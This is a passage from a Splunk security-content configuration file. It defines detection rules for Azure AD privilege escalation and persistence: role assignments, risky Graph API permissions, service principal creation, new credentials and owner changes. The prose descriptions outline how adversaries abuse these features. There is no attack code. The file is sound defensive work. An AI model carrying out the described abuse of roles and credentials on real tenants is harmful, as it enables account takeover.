action.correlationsearch.label = ESCU - Azure AD Privileged Authentication Administrator Role Assigned - Rule
action.correlationsearch.annotations = {"analytic_story": ["Azure Active Directory Privilege Escalation"], "cis20": ["CIS 10"], "confidence": 50, "impact": 100, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1003.002"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = The following analytic identifies the assignment of the Privileged Authentication Administrator role to an Azure AD user. Users in this role can set or reset authentication methods for any user in Azure Active Directory, including privileged roles like Global Administrators. Users with this role can change credentials for people who may have access to sensitive or private information or critical configuration inside and outside of Azure Active Directory. Changing the credentials of a user may mean the ability to assume that user's identity and permissions. Red teams and adversaries alike may abuse this role to escalate their privileges.
action.notable.param.rule_title = Azure AD Privileged Authentication Administrator Role Assigned
action.notable.param.security_domain = identity
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `azure_monitor_aad` "operationName"="Add member to role" "properties.targetResources{}.modifiedProperties{}.newValue"="\"Privileged Authentication Administrator\"" | rename properties.* as * | rename initiatedBy.user.userPrincipalName as initiatedBy | stats count min(_time) as firstTime max(_time) as lastTime values(user) as user by initiatedBy, result, operationName | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `azure_ad_privileged_authentication_administrator_role_assigned_filter`

[ESCU - Azure AD Privileged Graph API Permission Assigned - Rule]
action.escu = 0
action.escu.enabled = 1
description = This Splunk analytic flags the assignment of three high-risk Graph API permissions in Azure AD: Application.ReadWrite.All (1bfefb4e-e0b5-418b-a88f-73c46d2cc8e9), AppRoleAssignment.ReadWrite.All (06b708a9-e830-4db3-a914-8e69da51d44f), and RoleManagement.ReadWrite.Directory (9e3f62cf-ca93-4989-b6ce-bf83c28f9fe8). These permissions enable broad control over Azure AD, including application and directory settings. Utilizing azure_monitor_aad data, the query scans AuditLogs for 'Update application' operations, identifying when these permissions are assigned. It collects data on user, object, and user agent. Immediate attention is needed upon detection, as misuse of these permissions can lead to unauthorized Azure AD modifications and potential security breaches.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1003.002"], "nist": ["DE.CM"]}
action.escu.data_models = []
action.escu.eli5 = This Splunk analytic flags the assignment of three high-risk Graph API permissions in Azure AD: Application.ReadWrite.All (1bfefb4e-e0b5-418b-a88f-73c46d2cc8e9), AppRoleAssignment.ReadWrite.All (06b708a9-e830-4db3-a914-8e69da51d44f), and RoleManagement.ReadWrite.Directory (9e3f62cf-ca93-4989-b6ce-bf83c28f9fe8). These permissions enable broad control over Azure AD, including application and directory settings. Utilizing azure_monitor_aad data, the query scans AuditLogs for 'Update application' operations, identifying when these permissions are assigned. It collects data on user, object, and user agent. Immediate attention is needed upon detection, as misuse of these permissions can lead to unauthorized Azure AD modifications and potential security breaches.
action.escu.how_to_implement = You must install the latest version of Splunk Add-on for Microsoft Cloud Services from Splunkbase (https://splunkbase.splunk.com/app/3110/#/details). You must be ingesting Azure Active Directory events into your Splunk environment. This analytic was written to be used with the azure:monitor:aad sourcetype leveraging the AuditLog log category.
action.escu.known_false_positives = Privileged Graph API permissions may be assigned for legitimate purposes. Filter as needed.
action.escu.creation_date = 2024-01-30
action.escu.modification_date = 2024-01-30
action.escu.confidence = high
action.escu.full_search_name = ESCU - Azure AD Privileged Graph API Permission Assigned - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Azure AD", "Entra ID"]
action.escu.analytic_story = ["Azure Active Directory Persistence", "NOBELIUM Group"]
action.risk = 1
action.risk.param._risk_message = User $user$ assigned privileged Graph API permissions to $object$
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "other", "risk_score": 54}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Azure AD Privileged Graph API Permission Assigned - Rule
action.correlationsearch.annotations = {"analytic_story": ["Azure Active Directory Persistence", "NOBELIUM Group"], "cis20": ["CIS 10"], "confidence": 60, "impact": 90, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1003.002"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = This Splunk analytic flags the assignment of three high-risk Graph API permissions in Azure AD: Application.ReadWrite.All (1bfefb4e-e0b5-418b-a88f-73c46d2cc8e9), AppRoleAssignment.ReadWrite.All (06b708a9-e830-4db3-a914-8e69da51d44f), and RoleManagement.ReadWrite.Directory (9e3f62cf-ca93-4989-b6ce-bf83c28f9fe8). These permissions enable broad control over Azure AD, including application and directory settings. Utilizing azure_monitor_aad data, the query scans AuditLogs for 'Update application' operations, identifying when these permissions are assigned. It collects data on user, object, and user agent. Immediate attention is needed upon detection, as misuse of these permissions can lead to unauthorized Azure AD modifications and potential security breaches.
action.notable.param.rule_title = Azure AD Privileged Graph API Permission Assigned
action.notable.param.security_domain = identity
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `azure_monitor_aad` category=AuditLogs operationName="Update application" | eval newvalue = mvindex('properties.targetResources{}.modifiedProperties{}.newValue',0) | spath input=newvalue | search "{}.RequiredAppPermissions{}.EntitlementId"="1bfefb4e-e0b5-418b-a88f-73c46d2cc8e9" OR "{}.RequiredAppPermissions{}.EntitlementId"="06b708a9-e830-4db3-a914-8e69da51d44f" OR "{}.RequiredAppPermissions{}.EntitlementId"="9e3f62cf-ca93-4989-b6ce-bf83c28f9fe8" | eval Permissions = '{}.RequiredAppPermissions{}.EntitlementId' | stats count earliest(_time) as firstTime latest(_time) as lastTime values(Permissions) by user, object, user_agent, operationName | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `azure_ad_privileged_graph_api_permission_assigned_filter`

[ESCU - Azure AD Privileged Role Assigned - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic identifies the assignment of sensitive and privileged Azure Active Directory roles to an Azure AD user. Adversaries and red teams alike may assign these roles to a compromised account to establish Persistence in an Azure AD environment.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1098", "T1098.003"], "nist": ["DE.CM"]}
action.escu.data_models = []
action.escu.eli5 = The following analytic identifies the assignment of sensitive and privileged Azure Active Directory roles to an Azure AD user. Adversaries and red teams alike may assign these roles to a compromised account to establish Persistence in an Azure AD environment.
action.escu.how_to_implement = You must install the latest version of Splunk Add-on for Microsoft Cloud Services from Splunkbase (https://splunkbase.splunk.com/app/3110/#/details). You must be ingesting Azure Active Directory events into your Splunk environment. This analytic was written to be used with the azure:monitor:aad sourcetype leveraging the AuditLog log category.
action.escu.known_false_positives = Administrators will legitimately assign privileged roles to users as part of administrative tasks. Filter as needed.
action.escu.creation_date = 2023-12-20
action.escu.modification_date = 2023-12-20
action.escu.confidence = high
action.escu.full_search_name = ESCU - Azure AD Privileged Role Assigned - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Azure AD", "Entra ID"]
action.escu.analytic_story = ["Azure Active Directory Persistence", "NOBELIUM Group"]
action.risk = 1
action.risk.param._risk_message = A privileged Azure AD role was assigned for User $user$ initiated by $initiatedBy$
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 63}, {"risk_object_field": "initiatedBy", "risk_object_type": "other", "risk_score": 63}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Azure AD Privileged Role Assigned - Rule
action.correlationsearch.annotations = {"analytic_story": ["Azure Active Directory Persistence", "NOBELIUM Group"], "cis20": ["CIS 10"], "confidence": 90, "impact": 70, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1098", "T1098.003"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = The following analytic identifies the assignment of sensitive and privileged Azure Active Directory roles to an Azure AD user. Adversaries and red teams alike may assign these roles to a compromised account to establish Persistence in an Azure AD environment.
action.notable.param.rule_title = Azure AD Privileged Role Assigned
action.notable.param.security_domain = audit
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `azure_monitor_aad` "operationName"="Add member to role" | rename properties.* as * | rename initiatedBy.user.userPrincipalName as initiatedBy | rename targetResources{}.modifiedProperties{}.newValue as roles | eval role=mvindex(roles,1) | lookup privileged_azure_ad_roles azureadrole AS role OUTPUT isprvilegedadrole description | search isprvilegedadrole = True | stats count min(_time) as firstTime max(_time) as lastTime values(user) as user by initiatedBy, result, operationName, role, description | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `azure_ad_privileged_role_assigned_filter`

[ESCU - Azure AD Privileged Role Assigned to Service Principal - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic detects potential privilege escalation threats in Azure Active Directory (AD). The detection is made by running a specific search within the ingested Azure Active Directory events to leverage the AuditLogs log category. This detection is important because it identifies instances where privileged roles that hold elevated permissions are assigned to service principals. This prevents unauthorized access or malicious activities, which occur when these non-human entities access Azure resources to exploit them. False positives might occur since administrators can legitimately assign privileged roles to service principals.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1098", "T1098.003"], "nist": ["DE.CM"]}
action.escu.data_models = []
action.escu.eli5 = The following analytic detects potential privilege escalation threats in Azure Active Directory (AD). The detection is made by running a specific search within the ingested Azure Active Directory events to leverage the AuditLogs log category. This detection is important because it identifies instances where privileged roles that hold elevated permissions are assigned to service principals. This prevents unauthorized access or malicious activities, which occur when these non-human entities access Azure resources to exploit them. False positives might occur since administrators can legitimately assign privileged roles to service principals.
action.escu.how_to_implement = You must install the latest version of Splunk Add-on for Microsoft Cloud Services from Splunkbase (https://splunkbase.splunk.com/app/3110/#/details). You must be ingesting Azure Active Directory events into your Splunk environment. This analytic was written to be used with the azure:monitor:aad sourcetype leveraging the AuditLog log category.
action.escu.known_false_positives = Administrators may legitimately assign the privileged roles to Service Principals as part of administrative tasks. Filter as needed.
action.escu.creation_date = 2023-12-20
action.escu.modification_date = 2023-12-20
action.escu.confidence = high
action.escu.full_search_name = ESCU - Azure AD Privileged Role Assigned to Service Principal - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Azure AD", "Entra ID"]
action.escu.analytic_story = ["Azure Active Directory Privilege Escalation", "NOBELIUM Group"]
action.risk = 1
action.risk.param._risk_message = A privileged Azure AD role was assigned to the Service Principal $displayName$ initiated by $initiatedBy$
action.risk.param._risk = [{"risk_object_field": "initiatedBy", "risk_object_type": "other", "risk_score": 35}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Azure AD Privileged Role Assigned to Service Principal - Rule
action.correlationsearch.annotations = {"analytic_story": ["Azure Active Directory Privilege Escalation", "NOBELIUM Group"], "cis20": ["CIS 10"], "confidence": 50, "impact": 70, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1098", "T1098.003"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = The following analytic detects potential privilege escalation threats in Azure Active Directory (AD). The detection is made by running a specific search within the ingested Azure Active Directory events to leverage the AuditLogs log category. This detection is important because it identifies instances where privileged roles that hold elevated permissions are assigned to service principals. This prevents unauthorized access or malicious activities, which occur when these non-human entities access Azure resources to exploit them. False positives might occur since administrators can legitimately assign privileged roles to service principals.
action.notable.param.rule_title = Azure AD Privileged Role Assigned to Service Principal
action.notable.param.security_domain = identity
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `azure_monitor_aad` operationName="Add member to role" | rename properties.* as * | search "targetResources{}.type"=ServicePrincipal | rename initiatedBy.user.userPrincipalName as initiatedBy | rename targetResources{}.modifiedProperties{}.newValue as roles | eval role=mvindex(roles,1) | rename targetResources{}.displayName as apps | eval displayName=mvindex(apps,0) | lookup privileged_azure_ad_roles azureadrole AS role OUTPUT isprvilegedadrole description | search isprvilegedadrole = True | stats count min(_time) as firstTime max(_time) as lastTime values(displayName) as displayName by initiatedBy, result, operationName, role | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `azure_ad_privileged_role_assigned_to_service_principal_filter`

[ESCU - Azure AD Service Principal Authentication - Rule]
action.escu = 0
action.escu.enabled = 1
description = Monitoring service principal authentication events in Azure Active Directory is crucial, but to effectively leverage this detection, teams should first conduct a thorough inventory of all service principals and their source IPs to establish a baseline of normal behavior. The detection, using azure_monitor_aad, specifically targets "Sign-in activity" within ServicePrincipalSignInLogs, gathering key details like sign-in frequency, timing, source IPs, and accessed resources. This baseline is essential for SOC teams to distinguish between regular application authentication and anomalous patterns that might suggest compromised credentials or malicious activities.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078.004"], "nist": ["DE.CM"]}
action.escu.data_models = []
action.escu.eli5 = Monitoring service principal authentication events in Azure Active Directory is crucial, but to effectively leverage this detection, teams should first conduct a thorough inventory of all service principals and their source IPs to establish a baseline of normal behavior. The detection, using azure_monitor_aad, specifically targets "Sign-in activity" within ServicePrincipalSignInLogs, gathering key details like sign-in frequency, timing, source IPs, and accessed resources. This baseline is essential for SOC teams to distinguish between regular application authentication and anomalous patterns that might suggest compromised credentials or malicious activities.
action.escu.how_to_implement = You must install the latest version of Splunk Add-on for Microsoft Cloud Services from Splunkbase (https://splunkbase.splunk.com/app/3110/#/details). You must be ingesting Azure Active Directory events into your Splunk environment through an EventHub. This analytic was written to be used with the azure:monitor:aad sourcetype leveraging the SignInLogs log category.
action.escu.known_false_positives = Service Principals will legitimately authenticate remotely to your tenant. Implementing this detection after establishing a baseline enables a more accurate identification of security threats, ensuring proactive and informed responses to safeguard the Azure AD environment.
action.escu.creation_date = 2024-02-12
action.escu.modification_date = 2024-02-12
action.escu.confidence = high
action.escu.full_search_name = ESCU - Azure AD Service Principal Authentication - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Azure AD", "Entra ID"]
action.escu.analytic_story = ["Azure Active Directory Account Takeover", "NOBELIUM Group"]
action.risk = 1
action.risk.param._risk_message = Service Principal $user$ authenticated from $src_ip$
action.risk.param._risk = [{"threat_object_field": "src_ip", "threat_object_type": "ip_address"}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 25}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Azure AD Service Principal Authentication - Rule
action.correlationsearch.annotations = {"analytic_story": ["Azure Active Directory Account Takeover", "NOBELIUM Group"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078.004"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = Monitoring service principal authentication events in Azure Active Directory is crucial, but to effectively leverage this detection, teams should first conduct a thorough inventory of all service principals and their source IPs to establish a baseline of normal behavior. The detection, using azure_monitor_aad, specifically targets "Sign-in activity" within ServicePrincipalSignInLogs, gathering key details like sign-in frequency, timing, source IPs, and accessed resources. This baseline is essential for SOC teams to distinguish between regular application authentication and anomalous patterns that might suggest compromised credentials or malicious activities.
action.notable.param.rule_title = Azure AD Service Principal Authentication
action.notable.param.security_domain = identity
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `azure_monitor_aad` operationName="Sign-in activity" category=ServicePrincipalSignInLogs | rename properties.* as * | stats count earliest(_time) as firstTime latest(_time) as lastTime by user, user_id, src_ip, resourceDisplayName, resourceId | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `azure_ad_service_principal_authentication_filter`

[ESCU - Azure AD Service Principal Created - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic identifies the creation of a Service Principal in an Azure AD environment. An Azure Service Principal is an identity designed to be used with applications, services, and automated tools to access resources. It is similar to a service account within an Active Directory environment. Service Principal authentication does not support multi-factor authentication nor conditional access policies. Adversaries and red teams alike who have obtained administrative access may create a Service Principal to establish Persistence and obtain single-factor access to an Azure AD environment.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1136.003"], "nist": ["DE.CM"]}
action.escu.data_models = []
action.escu.eli5 = The following analytic identifies the creation of a Service Principal in an Azure AD environment. An Azure Service Principal is an identity designed to be used with applications, services, and automated tools to access resources. It is similar to a service account within an Active Directory environment. Service Principal authentication does not support multi-factor authentication nor conditional access policies. Adversaries and red teams alike who have obtained administrative access may create a Service Principal to establish Persistence and obtain single-factor access to an Azure AD environment.
action.escu.how_to_implement = You must install the latest version of Splunk Add-on for Microsoft Cloud Services from Splunkbase (https://splunkbase.splunk.com/app/3110/#/details). You must be ingesting Azure Active Directory events into your Splunk environment through an EventHub. This analytic was written to be used with the azure:monitor:aad sourcetype leveraging the AuditLog log category.
action.escu.known_false_positives = Administrators may legitimately create Service Principals. Filter as needed.
action.escu.creation_date = 2022-08-17
action.escu.modification_date = 2022-08-17
action.escu.confidence = high
action.escu.full_search_name = ESCU - Azure AD Service Principal Created - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Azure AD", "Entra ID"]
action.escu.analytic_story = ["Azure Active Directory Persistence", "NOBELIUM Group"]
action.risk = 1
action.risk.param._risk_message = Service Principal named $displayName$ created by $user$
action.risk.param._risk = [{"risk_object_field": "displayName", "risk_object_type": "other", "risk_score": 45}, {"risk_object_field": "user", "risk_object_type": "other", "risk_score": 45}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Azure AD Service Principal Created - Rule
action.correlationsearch.annotations = {"analytic_story": ["Azure Active Directory Persistence", "NOBELIUM Group"], "cis20": ["CIS 10"], "confidence": 90, "impact": 50, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1136.003"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = The following analytic identifies the creation of a Service Principal in an Azure AD environment. An Azure Service Principal is an identity designed to be used with applications, services, and automated tools to access resources. It is similar to a service account within an Active Directory environment. Service Principal authentication does not support multi-factor authentication nor conditional access policies. Adversaries and red teams alike who have obtained administrative access may create a Service Principal to establish Persistence and obtain single-factor access to an Azure AD environment.
action.notable.param.rule_title = Azure AD Service Principal Created
action.notable.param.security_domain = threat
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `azure_monitor_aad` operationName="Add service principal" properties.initiatedBy.user.id=* | rename properties.* as * | rename targetResources{}.displayName as displayName | rename targetResources{}.type as type | stats count min(_time) as firstTime max(_time) as lastTime values(displayName) as displayName by type, user, result, operationName | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `azure_ad_service_principal_created_filter`

[ESCU - Azure AD Service Principal New Client Credentials - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic identifies the addition of new credentials for Service Principals and Applications in addition to existing legitimate credentials in Azure AD. These credentials include both x509 certificates and passwords. With sufficient permissions, there are a variety of ways to add credentials including the Azure Portal, Azure command line interface, and Azure or Az PowerShell modules. Adversaries and red teams alike who have obtained privileged access to Azure AD may add credentials to Service Principals to maintain persistent access to victim accounts and other instances within the Azure environment. By compromising an account that is an Owner of an application with privileged access, attackers may also escalate their privileges in an Azure AD environment by adding new credentials and logging in as the service principal.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1098", "T1098.001"], "nist": ["DE.CM"]}
action.escu.data_models = []
action.escu.eli5 = The following analytic identifies the addition of new credentials for Service Principals and Applications in addition to existing legitimate credentials in Azure AD. These credentials include both x509 certificates and passwords. With sufficient permissions, there are a variety of ways to add credentials including the Azure Portal, Azure command line interface, and Azure or Az PowerShell modules. Adversaries and red teams alike who have obtained privileged access to Azure AD may add credentials to Service Principals to maintain persistent access to victim accounts and other instances within the Azure environment. By compromising an account that is an Owner of an application with privileged access, attackers may also escalate their privileges in an Azure AD environment by adding new credentials and logging in as the service principal.
action.escu.how_to_implement = You must install the latest version of Splunk Add-on for Microsoft Cloud Services from Splunkbase (https://splunkbase.splunk.com/app/3110/#/details). You must be ingesting Azure Active Directory events into your Splunk environment. This analytic was written to be used with the azure:monitor:aad sourcetype leveraging the Signin log category.
action.escu.known_false_positives = Service Principal client credential modifications may be part of legitimate administrative operations. Filter as needed.
action.escu.creation_date = 2023-12-20
action.escu.modification_date = 2023-12-20
action.escu.confidence = high
action.escu.full_search_name = ESCU - Azure AD Service Principal New Client Credentials - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Azure AD", "Entra ID"]
action.escu.analytic_story = ["Azure Active Directory Persistence", "Azure Active Directory Privilege Escalation", "NOBELIUM Group"]
action.risk = 1
action.risk.param._risk_message = New credentials added for Service Principal $displayName$
action.risk.param._risk = [{"risk_object_field": "displayName", "risk_object_type": "user", "risk_score": 35}, {"risk_object_field": "user", "risk_object_type": "other", "risk_score": 35}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Azure AD Service Principal New Client Credentials - Rule
action.correlationsearch.annotations = {"analytic_story": ["Azure Active Directory Persistence", "Azure Active Directory Privilege Escalation", "NOBELIUM Group"], "cis20": ["CIS 10"], "confidence": 50, "impact": 70, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1098", "T1098.001"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = The following analytic identifies the addition of new credentials for Service Principals and Applications in addition to existing legitimate credentials in Azure AD. These credentials include both x509 certificates and passwords. With sufficient permissions, there are a variety of ways to add credentials including the Azure Portal, Azure command line interface, and Azure or Az PowerShell modules. Adversaries and red teams alike who have obtained privileged access to Azure AD may add credentials to Service Principals to maintain persistent access to victim accounts and other instances within the Azure environment. By compromising an account that is an Owner of an application with privileged access, attackers may also escalate their privileges in an Azure AD environment by adding new credentials and logging in as the service principal.
action.notable.param.rule_title = Azure AD Service Principal New Client Credentials
action.notable.param.security_domain = threat
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `azure_monitor_aad` category=AuditLogs operationName="Update application*Certificates and secrets management " | rename properties.* as * | rename targetResources{}.* as * | stats count min(_time) as firstTime max(_time) as lastTime values(displayName) as displayName by user, modifiedProperties{}.newValue, src_ip | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `azure_ad_service_principal_new_client_credentials_filter`

[ESCU - Azure AD Service Principal Owner Added - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic identifies the addition of a new owner for a Service Principal within an Azure AD tenant. An Azure Service Principal is an identity designed to be used with applications, services, and automated tools to access resources. It is similar to a service account within an Active Directory environment. Service Principal authentication does not support multi-factor authentication nor conditional access policies. Adversaries and red teams alike who have obtained administrative access may add a new owner for an existing Service Principal to establish Persistence and obtain single-factor access to an Azure AD environment. Attackers who are looking to escalate their privileges by leveraging a Service Principal's permissions may also add a new owner.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1098"], "nist": ["DE.CM"]}
action.escu.data_models = []
action.escu.eli5 = The following analytic identifies the addition of a new owner for a Service Principal within an Azure AD tenant. An Azure Service Principal is an identity designed to be used with applications, services, and automated tools to access resources. It is similar to a service account within an Active Directory environment. Service Principal authentication does not support multi-factor authentication nor conditional access policies. Adversaries and red teams alike who have obtained administrative access may add a new owner for an existing Service Principal to establish Persistence and obtain single-factor access to an Azure AD environment. Attackers who are looking to escalate their privileges by leveraging a Service Principal's permissions may also add a new owner.
action.escu.how_to_implement = You must install the latest version of Splunk Add-on for Microsoft Cloud Services from Splunkbase (https://splunkbase.splunk.com/app/3110/#/details). You must be ingesting Azure Active Directory events into your Splunk environment through an EventHub. This analytic was written to be used with the azure:monitor:aad sourcetype leveraging the AuditLog log category.
action.escu.known_false_positives = Administrators may legitimately add new owners for Service Principals. Filter as needed.
action.escu.creation_date = 2023-12-20
action.escu.modification_date = 2023-12-20
action.escu.confidence = high
action.escu.full_search_name = ESCU - Azure AD Service Principal Owner Added - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Azure AD", "Entra ID"]
action.escu.analytic_story = ["Azure Active Directory Persistence", "Azure Active Directory Privilege Escalation", "NOBELIUM Group"]
action.risk = 1
action.risk.param._risk_message = A new owner was added for service principal $displayName$ by $initiatedBy$
action.risk.param._risk = [{"risk_object_field": "displayName", "risk_object_type": "other", "risk_score": 54}, {"risk_object_field": "initiatedBy", "risk_object_type": "other", "risk_score": 54}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Azure AD Service Principal Owner Added - Rule
action.correlationsearch.annotations = {"analytic_story": ["Azure Active Directory Persistence", "Azure Active Directory Privilege Escalation", "NOBELIUM Group"], "cis20": ["CIS 10"], "confidence": 90, "impact": 60, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1098"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = The following analytic identifies the addition of a new owner for a Service Principal within an Azure AD tenant. An Azure Service Principal is an identity designed to be used with applications, services, and automated tools to access resources. It is similar to a service account within an Active Directory environment. Service Principal authentication does not support multi-factor authentication nor conditional access policies. Adversaries and red teams alike who have obtained administrative access may add a new owner for an existing Service Principal to establish Persistence and obtain single-factor access to an Azure AD environment. Attackers who are looking to escalate their privileges by leveraging a Service Principal's permissions may also add a new owner.
action.notable.param.rule_title = Azure AD Service Principal Owner Added
action.notable.param.security_domain = audit
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `azure_monitor_aad` operationName="Add owner to application" | rename properties.* as * | rename initiatedBy.user.userPrincipalName as initiatedBy | rename targetResources{}.userPrincipalName as newOwner | rename targetResources{}.modifiedProperties{}.newValue as displayName | eval displayName = mvindex(displayName,1) | where initiatedBy!=newOwner | stats count min(_time) as firstTime max(_time) as lastTime values(displayName) as displayName by initiatedBy, result, operationName, newOwner | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `azure_ad_service_principal_owner_added_filter`

[ESCU - Azure AD Successful Authentication From Different Ips - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic identifies an Azure AD account successfully authenticating from more than one unique IP address in the span of 30 minutes. This behavior could represent an adversary who has stolen credentials via a phishing attack or some other method and is using them to access corporate online resources around the same time as a legitimate user. As users may behave differently across organizations, security teams should test and customize this detection to fit their environments.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1110", "T1110.001", "T1110.003"], "nist": ["DE.CM"]}
action.escu.data_models = []
action.escu.eli5 = The following analytic identifies an Azure AD account successfully authenticating from more than one unique IP address in the span of 30 minutes. This behavior could represent an adversary who has stolen credentials via a phishing attack or some other method and is using them to access corporate online resources around the same time as a legitimate user. As users may behave differently across organizations, security teams should test and customize this detection to fit their environments.
action.escu.how_to_implement = You must install the latest version of Splunk Add-on for Microsoft Cloud Services from Splunkbase (https://splunkbase.splunk.com/app/3110/#/details). You must be ingesting Azure Active Directory events into your Splunk environment through an EventHub. This analytic was written to be used with the azure:monitor:aad sourcetype leveraging the Signin log category.
